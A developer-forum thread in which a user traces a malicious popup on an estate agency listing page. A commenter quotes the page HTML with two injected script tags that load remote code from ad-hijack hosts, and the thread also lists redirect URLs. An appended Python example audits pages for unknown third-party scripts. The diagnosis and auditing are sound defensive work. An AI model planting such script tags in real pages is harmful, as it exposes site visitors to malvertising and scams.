2
Nanos
25d

I can't figure out if it's Google that is infected, or this website, or my machine.. (Only tested it on 2 PCs so far.)

Any pointers welcomed !

Appears for sure in MS Edge browser and Internet Explorer. (So make sure you have antivirus running/etc. or a sandbox machine/etc.)

I think the problem is with Google...

Go to:

https://www.google.co.uk

Search for:

diamondestates.co.uk/property/wonderful-investment-opportunity-spacious-freehold-4-bedroom-3-reception-victorian-house/

Click on 'images'

Then click on the first picture.

Then click on the preview/etc. pane on the right in Google, which takes you to the diamondestates website

Then click on the right arrow in the picture on the diamondestates website to go to the next picture, and bingo a popup !

Related URLs it takes you to include:

d2izun4ii6k9up.cloudfront.net/lendsolyanka/index.html

9rnndpb8.reactionpcservice.fun/prelandersysdefold_alert__1574952573/index.html

deloplen.com/afu.php

https://joesandbox.com/analysis/...
> Analysis Report deloplen.com/afu.php

Useful input welcomed, and if anyone wants to inform the infected site they have an infection, please feel free to do so !

Last few times when I've tried to do that, people haven't understood me very well, and nowadays I'd worry they would think I had planted it, when I just want to tell them they have an infection !

I suspect it's the diamondestates website, but if you go there directly, the infection doesn't pop up, it only appears to happen if you go via Google.

Comments
  • 1
    Here you are: *ptr

    Or do you prefer English pointer?
  • 0
    Probably neither your computer nor the website is infected directly, also Google probably doesn't have anything related to the issue.
    For me it seems to be either some kind of XSS, or a false positive result.
    Btw it's odd, that you have a C++ avatar, but write about not understanding jokes about pointers.
  • 0
    @tman

    What's a pointer..

    I'm still learning C++ :-)
  • 0
    @tman

    > a false positive result.

    It can't be that, since it does open a dodgy popup !

    If it happens on someone else's machine, then it's more likely to be the website (Or Google..) that is infected.
  • 2
    It's the page, most likely an XSS injection. The main content of that page has two link hijackers at the very end:

    @highlight

    <section>
    <p>Diamond Estate Agency is delighted to present this SUPERB INVESTMENT OPPORTUNITY! Freehold unmodernised house on residential road near tube, buses and shops with enormous potential. It boasts 4 bedrooms, 3 reception rooms, kitchen and bathroom.</p>
    <p><span style="line-height: 27.2px;">Ideal for builder or investor.</span></p>
    <p>Full vacant possession offered.</p>
    <p>Viewing highly recommended!</p>
    <script type="text/javascript" src="//deloplen.com/apu.php?zoneid=2933250" async="" data-cfasync="false"></script>
    <script src="https://pushlaram.com/pfe/current/..." data-cfasync="false" async=""></script>
    </section>
  • 0
    @ethernetzero

    Thank you, most appreciated.
  • 0
    Someone said to me that they experienced the same thing on their PC too.
  • 1
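An added example, not part of the thread and not written by any commenter: a site owner could audit a saved copy of a page for the kind of injected third-party `<script>` tags quoted in the comment above. The function name `audit_scripts`, the allowlist and the sample HTML with its `example` hostnames are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class ScriptCollector(HTMLParser):
    """Collect the attributes of every <script> tag that has a src."""

    def __init__(self):
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        attr_map = dict(attrs)
        if tag == "script" and attr_map.get("src"):
            self.scripts.append(attr_map)


def audit_scripts(html, page_url, allowed_hosts):
    """Return external script sources whose host is not on the allowlist."""
    page = urlsplit(page_url)
    allowed = {h.lower() for h in allowed_hosts} | {page.hostname}
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for attrs in collector.scripts:
        src = attrs["src"].strip()
        if src.startswith("//"):
            # Protocol-relative URL: inherits the scheme of the page.
            src = f"{page.scheme}:{src}"
        host = urlsplit(src).hostname
        if host is None:
            continue  # relative path, served by the site itself
        host = host.lower()
        if any(host == h or host.endswith("." + h) for h in allowed):
            continue
        findings.append({
            "host": host,
            "src": src,
            # data-cfasync="false" opts the tag out of Cloudflare Rocket Loader
            "cfasync_off": attrs.get("data-cfasync") == "false",
        })
    return findings


# Constructed sample page body (hostnames are placeholders).
SAMPLE = """<section>
<p>Listing description text.</p>
<script src="/js/gallery.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
<script type="text/javascript" src="//ads.example.net/tag.php?zoneid=1" async="" data-cfasync="false"></script>
</section>"""
```

Any host it reports that the site owner does not recognise is a reason to check where in the CMS content or templates that tag is stored.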